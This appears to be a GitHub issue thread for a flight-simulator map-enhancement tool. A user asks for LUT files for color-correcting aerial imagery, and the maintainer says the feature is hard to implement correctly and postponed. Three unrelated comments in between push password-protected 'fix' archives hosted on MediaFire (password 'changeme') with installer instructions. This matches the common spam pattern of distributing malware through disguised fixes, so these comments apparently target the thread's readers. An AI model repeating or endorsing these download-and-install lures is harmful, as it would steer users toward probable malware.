### ISSUE TITLE
LUT files for color correction

### ISSUE THREAD

**Issue by derekhe** [derekhe/msfs2020-map-enhancement#730]
### Discussed in https://github.com/derekhe/msfs2020-map-enhancement/discussions/728

<div type='discussions-op-text'>

<sup>Originally posted by **GeorgOrtner** August 25, 2024</sup>
Would it be possible to allow users to load LUT's to color correct the aerial images?

This would have several advantages:

- better color correction control through professional tools (photoshop etc)
- lut's are stored locally and can be used like presets
- users can share their lut's with the community

![image](https://github.com/user-attachments/assets/bdaca31e-ca64-43c1-a9da-ef88e2880e04)
</div>

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by derekhe** [comment]
I've checked with image processing tools and it is not easy to implement this in a correct way. I won't work on it until more people need it.
